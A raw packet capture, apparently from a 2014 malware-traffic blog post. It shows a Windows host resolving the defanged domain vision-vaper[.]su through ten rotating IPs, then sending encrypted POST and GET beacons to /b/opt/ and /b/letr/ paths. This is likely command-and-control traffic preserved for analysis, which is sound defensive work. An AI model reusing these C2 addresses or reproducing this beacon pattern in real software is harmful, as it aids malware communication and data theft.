2014-08-06 18:33:16.400506 IP 176.120.47.28.80 > 172.16.165.132.49158: Flags [.], ack 337, win 64240, length 0
E..(.5….Xq.x/……P..g..;….P…7Z……..
2014-08-06 18:33:16.473522 IP 176.120.47.28.80 > 172.16.165.132.49159: Flags [S.], seq 2575799741, ack 4212457541, win 64240, options [mss 1460], length 0
E..,.6….Xl.x/……P………E`………….
2014-08-06 18:33:16.473629 IP 172.16.165.132.49159 > 176.120.47.28.80: Flags [.], ack 1, win 64240, length 0
E..(..@……….x/….P…E….P………….
2014-08-06 18:33:16.795942 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [.], ack 180, win 64062, length 0
E..(..@……….x/….P….g…P..>7Y……..
2014-08-06 18:33:16.796060 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [F.], seq 337, ack 180, win 64062, length 0
E..(..@……….x/….P….g…P..>7X……..
2014-08-06 18:33:16.796130 IP 176.120.47.28.80 > 172.16.165.132.49158: Flags [.], ack 338, win 64239, length 0
E..(.8….Xn.x/……P..g…….P…6………
2014-08-06 18:34:11.112303 IP 172.16.165.132.64192 > 172.16.165.2.53: 34124+ A? vision-vaper[.]su. (33)
E..=…….Z………..5.)…L………..vision-vaper[.]su…..
2014-08-06 18:34:11.151982 IP 172.16.165.2.53 > 172.16.165.132.64192: 34124 10/0/0 A 176.120.47.28, A 31.202.203.170, A 173.95.149.72, A 93.77.75.2, A 109.104.188.118, A 213.111.176.60, A 46.109.158.122, A 46.173.98.20, A 96.239.101.14, A 50.83.36.2 (193)
E….N……………5…….L…..
…..vision-vaper[.]su………………x/…………………………_.H…………]MK………….mh.v………….o.<.............m.z..............b.............`.e.............2S$. 2014-08-06 18:34:11.152633 IP 172.16.165.132.49161 > 176.120.47.28.80: Flags [S], seq 3454884586, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……….x/.. .P..Z……. .4……………
2014-08-06 18:34:11.853076 IP 172.16.165.132.49161 > 176.120.47.28.80: Flags [S], seq 3454884586, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……….x/.. .P..Z……. .4……………
2014-08-06 18:34:12.538977 IP 172.16.165.132.49161 > 176.120.47.28.80: Flags [S], seq 3454884586, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……….x/.. .P..Z…..p. .H………..
2014-08-06 18:34:12.982959 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [S], seq 419036014, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…………..
.P…n…… .=D…………..
2014-08-06 18:34:14.178899 IP 31.202.203.170.80 > 172.16.165.132.49162: Flags [S.], seq 1028073192, ack 419036015, win 64240, options [mss 1460], length 0
E..,.R….Lp………P.
=G&….o`…’)……..
2014-08-06 18:34:14.179009 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [.], ack 1, win 64240, length 0
E..(..@…………..
.P…o=G&.P…>………
2014-08-06 18:34:14.179216 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [P.], seq 1:466, ack 1, win 64240, length 465
E…..@….>………
.P…o=G&.P…….POST /b/opt/A495069680AF592C4FBDA4BB HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: vision-vaper[.]su
Content-Length: 185
Cache-Control: no-cache

s.;….mlJ.f}…rlMUOXW…]…..ZJ.@..`..].}….C….>……TB…..R.=…………… ..V..y….~c……..mA*.+}…=..w,.W….[….zQ.fW].=C….^..j.(I.I.YqE.r.h..1..n
.#..”..D..ZF^n..V
2014-08-06 18:34:14.179262 IP 31.202.203.170.80 > 172.16.165.132.49162: Flags [.], ack 466, win 64240, length 0
E..(.S….Ls………P.
=G&….@P…=………
2014-08-06 18:34:23.823221 IP 31.202.203.170.80 > 172.16.165.132.49162: Flags [P.], seq 1:405, ack 466, win 64240, length 404
E….W….J……….P.
=G&….@P…s…HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:32:24 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 254
Connection: close

s.&….$l .fV…Q’.U.
………..E.I..eN.E……t….h…q..U6…W.e.{…%.8….[..G.c..R..0..X.%!….].L.’ x..”.B.~.{m,.R…_…..hX.pS.~7_…\…6.!W._.$>C.%.f..6.. V….:..L….Xs..O….}……4w.’.:^..l3..=t………..H..e.7…….V ………
v.o4@..
2014-08-06 18:34:23.823357 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [F.], seq 466, ack 405, win 63836, length 0
E..(..@…………..
.P…@=G(}P..\=………
2014-08-06 18:34:23.823366 IP 31.202.203.170.80 > 172.16.165.132.49162: Flags [.], ack 467, win 64239, length 0
E..(.X….Ln………P.
=G(}…AP…;………
2014-08-06 18:34:23.825144 IP 172.16.165.132.49163 > 31.202.203.170.80: Flags [S], seq 402949620, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…………….P………. ……………..
2014-08-06 18:34:23.837360 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [.], ack 406, win 63836, length 0
E..(..@…………..
.P…A=G(~P..\=………
2014-08-06 18:34:24.029937 IP 31.202.203.170.80 > 172.16.165.132.49163: Flags [S.], seq 790012687, ack 402949621, win 64240, options [mss 1460], length 0
E..,.Z….Lh………P../…….`…/………
2014-08-06 18:34:24.029961 IP 172.16.165.132.49163 > 31.202.203.170.80: Flags [.], ack 1, win 64240, length 0
E..(..@…………….P…./…P…G^……..
2014-08-06 18:34:24.030117 IP 172.16.165.132.49163 > 31.202.203.170.80: Flags [P.], seq 1:220, ack 1, win 64240, length 219
E…..@….+………..P…./…P….r..GET /b/letr/9B249347C576AE4B0A6453DC HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: vision-vaper[.]su
Cache-Control: no-cache

2014-08-06 18:34:24.030127 IP 31.202.203.170.80 > 172.16.165.132.49163: Flags [.], ack 220, win 64240, length 0
E..(.[….Lk………P../…….P…F………
2014-08-06 18:34:24.437520 IP 31.202.203.170.80 > 172.16.165.132.49163: Flags [P.], seq 1:1239, ack 220, win 64240, length 1238
E….\….G……….P../…….P…….HTTP/1.1 200 OK

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *